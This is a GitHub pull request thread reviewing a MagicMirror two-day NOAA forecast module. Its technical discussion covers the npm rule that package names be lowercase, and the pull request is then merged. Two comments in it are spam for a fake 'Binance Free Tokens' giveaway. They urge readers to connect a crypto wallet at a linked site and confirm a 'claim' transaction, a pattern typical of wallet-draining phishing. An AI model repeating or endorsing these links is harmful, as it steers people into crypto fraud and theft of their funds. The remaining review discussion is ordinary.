### PR TITLE
Review

### PR DESCRIPTION
**Pull request by KristjanESPERANTO**
Thanks for this nice module! :slightly_smiling_face: 

I've reviewed the code and have some change suggestions.

Main changes are
- less dependencies from external modules,
- including the images,
- formatting,
- and fix typos.

With that the module will also be better presented in [the new module list](https://kristjanesperanto.github.io/MagicMirror-3rd-Party-Modules/) which I'm creating.

### CODE REVIEW

**Comment by manoharkumarmahto** [comment]
[Binance Free Tokens](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

Binance Free Tokens

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

File: package.json [hunk 1]
```diff
@@ -1,7 +1,7 @@
 {
-  "name": "MMM-2Day-NOAA-Forecast",
-  "version": "0.1.0",
-  "description": "MagicMirror2 module for 2-day forcast using NOAA API.",
+  "name": "mmm-2day-noaa-forecast",
```
Comment (jinserk) [inline package.json:2]: This should be beginning with uppercase letters "MMM" - according to the recommendation of [here](https://forum.magicmirror.builders/topic/4231/how-to-add-modules-for-absolute-beginners)

**Review by jinserk — CHANGES_REQUESTED** [review]
Mostly LGTM, except the package name in `package.json`. Once you fix this, I'll merge it to the main branch. Thanks for the contribution!

File: package.json (hunk 1 above)
Comment (KristjanESPERANTO) [reply package.json:2]: You are right that the official name should be written with uppercase letters. But in the packge.json the name field [has to be written with lowercase letters](https://docs.npmjs.com/creating-a-package-json-file) :slightly_smiling_face: 

`The "name" field contains your package's name, and must be lowercase and one word, and may contain hyphens and underscores.`

Comment (KristjanESPERANTO) [reply package.json:2]: If that's a problem for you, I'll be happy to change it back. I don't mind so much if it's in lowercase or not.

Comment (jinserk) [reply package.json:2]: Oh, I didn't know that limitation in npm guideline. Thanks for letting me know. I'll merge it then. Thank you once again!

**Comment by KristjanESPERANTO** [comment]
You are welcome!

Now your module is also displayed with a screenshot in the module list :slightly_smiling_face:

**Comment by jinserk** [comment]
> You are welcome!
> 
> Now your module is also displayed with a screenshot in the module list 🙂

Sorry for bothering you but what module list that you're talking?

**Comment by KristjanESPERANTO** [comment]
No problem :slightly_smiling_face:  I'm talking about this list: https://kristjanesperanto.github.io/MagicMirror-3rd-Party-Modules/. I've mentioned it in the first comment of this PR.

**Comment by jinserk** [comment]
> No problem 🙂 I'm talking about this list: https://kristjanesperanto.github.io/MagicMirror-3rd-Party-Modules/. I've mentioned it in the first comment of this PR.

Wow, it's cool! Sorry I didn't realize what you meant in the PR description. You made an awesome project!

**Comment by KristjanESPERANTO** [comment]
Thank you for the compliments! :smiley:  Let's see where the project goes, maybe it will become an official part of MagicMirror on day.

**Pull request merged**